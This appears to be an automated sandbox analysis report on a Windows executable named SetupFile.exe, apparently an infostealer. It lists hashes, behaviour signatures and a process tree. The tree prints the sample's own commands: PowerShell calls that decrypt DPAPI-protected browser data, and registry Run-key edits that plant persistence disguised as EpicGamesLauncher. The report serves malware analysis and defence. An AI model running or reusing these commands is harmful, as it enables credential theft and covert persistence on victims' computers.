Analysis

  • max time kernel
    153s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/03/2024, 21:28

General

  • Target

    SetupFile.exe

  • Size

    154.6MB

  • MD5

    101e173a0df61c3e89ec56e49104df9a

  • SHA1

    1ccfb7a85944bd7e84eed587af52b3b03b756575

  • SHA256

    21f5c39e0d4295dceb68bfa9a58e976f36d89e095a9d6eda4cb0d2e1640782a5

  • SHA512

    134f03e73020c2877c9d526351a344f0a2b80df1f5b0cbffec3afcac7954dc0c00ac2e7bffeff0434f637234721ed169aa263edb04ac5fb93bb2c507c4e12708

  • SSDEEP

    1572864:zCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:TDAgZi

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
    "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3412
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1408
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3872
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f
        3⤵
          PID:2472
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4664
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" /f"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\system32\reg.exe
          reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" /f
          3⤵
          • Adds Run key to start application
          PID:2796
      • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
        "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        2⤵
          PID:2972
        • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
          "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --mojo-platform-channel-handle=2120 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
          2⤵
            PID:4608
          • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
            "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1948 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4016

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                3KB

                MD5

                f48896adf9a23882050cdff97f610a7f

                SHA1

                4c5a610df62834d43f470cae7e851946530e3086

                SHA256

                3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

                SHA512

                16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                46d6c89b6a449ce91c1a3691c516e10e

                SHA1

                dedf2c05d83a8fc311e39fa86af575866f9f7ece

                SHA256

                f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f

                SHA512

                bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd

              • C:\Users\Admin\AppData\Local\Temp\46e6211c-8f1b-48ac-9806-c6228030a298.tmp.node

                Filesize

                1.8MB

                MD5

                3072b68e3c226aff39e6782d025f25a8

                SHA1

                cf559196d74fa490ac8ce192db222c9f5c5a006a

                SHA256

                7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

                SHA512

                61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfivb5fn.ikj.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/3960-19-0x000001B81C890000-0x000001B81C8E0000-memory.dmp

                Filesize

                320KB

              • memory/3960-15-0x000001B81C2F0000-0x000001B81C312000-memory.dmp

                Filesize

                136KB

              • memory/3960-17-0x000001B802350000-0x000001B802360000-memory.dmp

                Filesize

                64KB

              • memory/3960-23-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB

              • memory/3960-16-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB

              • memory/3960-18-0x000001B802350000-0x000001B802360000-memory.dmp

                Filesize

                64KB

              • memory/4016-75-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-77-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-78-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-79-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-76-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-68-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-69-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-67-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-74-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-73-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4664-42-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB

              • memory/4664-27-0x0000029D59860000-0x0000029D59870000-memory.dmp

                Filesize

                64KB

              • memory/4664-28-0x0000029D59860000-0x0000029D59870000-memory.dmp

                Filesize

                64KB

              • memory/4664-39-0x0000029D59860000-0x0000029D59870000-memory.dmp

                Filesize

                64KB

              • memory/4664-26-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB